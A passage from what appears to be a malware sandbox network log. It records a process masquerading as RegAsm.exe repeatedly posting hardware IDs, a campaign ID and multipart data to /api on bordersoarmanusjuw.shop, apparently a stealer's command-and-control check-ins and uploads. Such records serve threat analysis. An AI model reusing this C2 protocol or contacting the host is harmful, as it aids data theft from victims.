                                                                                                                                            Set-Cookie: PHPSESSID=mrhhcnksvpdlgk1b14td0dtt83; expires=Thu, 15-Aug-2024 07:18:06 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYt2oEAJmQaZc9cXRtXUdBY0tglAGthgtAX7rpHIcgc%2BAF%2FOGVDkpfs%2BubMv5JvRFxGT159J42T2KntFFVMYG2sm8AR2B%2B2qh4OENkyxYavJqMqroVQYlArBdLAbzxYNa5UEhXAh9uuqtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc03dd30456a-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:27 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49763 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:26 UTC | 290 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 584825
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:26 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:27 UTC | 818 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Apr 2024 13:31:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5sp8a0nuj3pj2t5bn28919gbrm; expires=Thu, 15-Aug-2024 07:18:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0z8YOU6Irrh%2FnMTvtdeXC4kcwMpZXoJQxw09RviJX%2BS96pf1kPKGyW13ZPuSX1q4baY3rFLdOMBMM8lB7k685556p3jASBW50Zb75WiO%2FXrfK25v%2F2V6Nq%2Ba%2B0mdVwPf4R9fcQ4BEdX4nA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 877dbc04ec6bb045-ATL
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49764 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:27 UTC | 290 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 584853
Host: bordersoarmanusjuw.shop
2024-04-21 13:31:27 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:29 UTC | 824 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Apr 2024 13:31:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kdrqkph8e5pneccuef64j0qrpb; expires=Thu, 15-Aug-2024 07:18:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biVAmSU6HO6LNj9leIBbFYoVEAfFz2BH4dqFs93%2FfL%2Btt%2BzXQ%2B%2F1ZaHjBGVGyZdhTAvR9kqlnN1vhfp9ccpDRxDpJXwd%2FqTrKKsWA8INpdEnL%2BPf8%2FuswlZhsVM%2BUTAtRQMkSDVcm1mG5w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 877dbc0a2aaf184b-ATL
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49765 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:28 UTC | 290 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 585358
Host: bordersoarmanusjuw.shop
2024-04-21 13:31:28 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
                                                                                                                                            Data Ascii: (Af-;Z>+u79=rC~6T`^\1wcOOD`4gw6X,V*q~F{-QOlgB+n9UbGjY!zO-S"iG_JU.$t=jB=|x+i;5V{|+Q=%5ua.
2024-04-21 13:31:29 UTC | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:29 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=avrgn4slqr7rp25l266m7idng1; expires=Thu, 15-Aug-2024 07:18:08 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FStwYrES1uS5i%2F1el8zTpNOTXm%2BwnrYnjXtcb04N33mnK%2FZ5m5A35fAd2inTNHvXkMPS8oBJD%2BC09agdP7iXxkEh9OtoQBqL3OYaaitxe4rrjZ7P3y%2BYfvRozLMTwD0MUJp2pqJTwHd3oQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc0c588e0d06-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49766 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:33 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:33 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-04-21 13:31:33 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:33 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=dka8ok65vnmmtn6afgre077o56; expires=Thu, 15-Aug-2024 07:18:12 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACgYRJFrr1I49rpxYQHmPIRc5q3GfCjNNpLWVv7IsXq1pCSGJtiX2IXkvZzmKAvwrN5eX45WebogDaMoKKBxwlabHxm7xs4kkJ6PDykXO%2BB%2BUCZs6G8dzY5oZde%2FD6WsA51ag3N7AB63fQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc2e3d0e7b94-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:33 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-04-21 13:31:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49767 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:34 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:34 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-04-21 13:31:34 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:34 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=3382eb0qgob4ib8bc6m34trkml; expires=Thu, 15-Aug-2024 07:18:13 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zu%2BtX9mpYvZmD8ZP3XoGs2%2BD9hwJ4gOsx1qlGUHhgrEhfXoejSj%2Fkz8rU4C1Ov%2F4cVrpaZSBP8as%2BHCF8vKphGY968gyXSRlMumgHBf3uuEDqddr7wl1fnSDD8LJYWo5hxrgRuea%2Fyv%2Bsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc32fd864575-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49768 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:34 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:34 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-04-21 13:31:35 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:35 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ovkug2kcqadhmi4hbftbts3p4n; expires=Thu, 15-Aug-2024 07:18:14 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1IeUblUcmQStgIOgEoQwuzcjL5LwWh2Ge2PEPBx38EVnXvfR%2FWbMdGFt%2BGzTMfC1CsQ3FlmnTrGYFpkhxKgL0%2BrQJdG11NgsHkPACsXQCLpQ9%2FU%2FN4AzbYWeMCT5a7UUCc3kPBydk6PX%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc364cdf7cc6-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49769 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:35 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:35 UTC | 8779 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:36 UTC | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:35 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=172t99gnf4428lvu1okc4s3sfg; expires=Thu, 15-Aug-2024 07:18:14 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwHt5f9FAeOm0NT5tGxlFL5lWlgZ4mIVDKKuKtFsBC2d%2BJsvCT1QvJI7zpZPu%2BvNb%2FAe%2Fc8VTKcrp25EpzlKZoswdiJOl%2Bm7NrEELuCMe7y54BG0tyfEYoFHm7LU5ERXbY88A4teJ5XgLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc3b4a497bba-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49770 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:36 UTC | 289 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:36 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

3
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:36 UTC | 5101 | OUT | Data Raw: [binary data]
2024-04-21 13:31:36 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:36 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ml8med8ogtb4r4t1mk8ut1jhbs; expires=Thu, 15-Aug-2024 07:18:15 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdqAfx%2F8HWyB44NJqhKzBVydcpqE%2BJu5E80p%2FKGw2UaaOv9%2B3ZYP2fBSWx4VghY7oZHRdOl%2Bp0c4AFpjEF5VU0EiYGt7PePGXTWy%2F2A%2BJy2hWuS6EDul8sGHNBol64SQybNUKhP8GXLEJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc404d507bc3-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49771 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:37 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:37 UTC | 7091 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:37 UTC | 820 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:37 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=uh7nhh71jk1f34aj3t9aprhcgm; expires=Thu, 15-Aug-2024 07:18:16 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pBOWNxxhX7XmPMLnKd2Kau68I8R%2F8R%2BBb16%2BYb7jmhZdcnndau%2FYN7gXs2JjcKSp5WpjrXc28d9J6RletdzNszNVcvzed9KRYU%2FdV%2FTlTBagvWruljrbZ18eGziWZAOi%2F1W9KjGbHqWCGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc459fdb44e4-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49772 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:37 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1412
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:37 UTC | 1412 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:38 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:38 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=2sg2vlsn0jeql5p53lq4eeblti; expires=Thu, 15-Aug-2024 07:18:17 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWCvfMpWCalHPuBx0%2FvwDm4FiJjz6EyLLFCwDzF2zUVbTnKooqvUIPlaPmp0x%2B73nA1AGQi8M7kf3X9yBcbo%2FDK8J3WoLpuctgWGZECiPwakr%2BWu5x67QuskmmxtLkNC2p1XLMsGp6WfQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc499e6eb077-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49773 | 172.67.189.66 | 443 | 2128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:38 UTC | 290 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
